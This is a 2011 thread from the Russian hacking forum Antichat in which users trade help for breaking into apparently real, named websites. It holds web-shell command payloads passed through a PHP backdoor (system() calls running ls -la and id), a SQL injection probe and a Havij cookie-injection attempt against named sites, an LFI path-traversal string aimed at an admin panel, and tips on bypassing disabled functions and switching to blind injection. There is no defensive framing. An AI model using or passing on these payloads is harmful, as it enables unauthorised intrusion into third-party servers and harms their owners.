ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.09.2011, 18:44
|
|
Новичок
Регистрация: 27.11.2009
Сообщений: 2
Провел на форуме:
15442
Репутация:
0
|
|
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
|
|
|
14.09.2011, 18:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от MyGreenLife
MyGreenLife said:
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
php?commanda=system($_GET[console]);&console=ls -la
|
|
|
|
14.09.2011, 18:54
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от MyGreenLife
MyGreenLife said:
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
Боюсь спрашивать, но рискну:
Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
|
|
|
|
14.09.2011, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от Tigger
Tigger said:
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
полностью с тобой согласен!
некоторые много говорят не поделу!
|
|
|
|
14.09.2011, 19:17
|
|
Новичок
Регистрация: 27.11.2009
Сообщений: 2
Провел на форуме:
15442
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо.
Сообщение от None
php?commanda=system($_GET[console]);&console=ls -la
Спасибо.
|
|
|
|
15.09.2011, 18:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Помогите со скулью:
http://nora-m.ru/index/2/product/220+order+by+1--
|
|
|
|
15.09.2011, 19:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
42706
Репутация:
6
|
|
_http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но..
Bypassing illegal union failed! Turning off this feature
Как решить ?
|
|
|
|
15.09.2011, 19:39
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
инклужу ее...
Сообщение от None
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
Вылазит форма добавления с actionом
поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
меняю action на
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
при добавление новости пишет "невозможно выполнить запрос".
Что еще можно попробовать сделать? |
|
|
|
15.09.2011, 20:50
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от vaddd
vaddd said:
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
инклужу ее...
Вылазит форма добавления с actionом
поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
меняю action на
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
при добавление новости пишет "невозможно выполнить запрос".
Что еще можно попробовать сделать?
скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.
|
|
|
|
15.09.2011, 21:11
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от Osstudio
Osstudio said:
Помогите со скулью:
http://nora-m.ru/index/2/product/220+order+by+1--
При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость.
Пардон, ошибся.Пробуй blind инъекцию
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
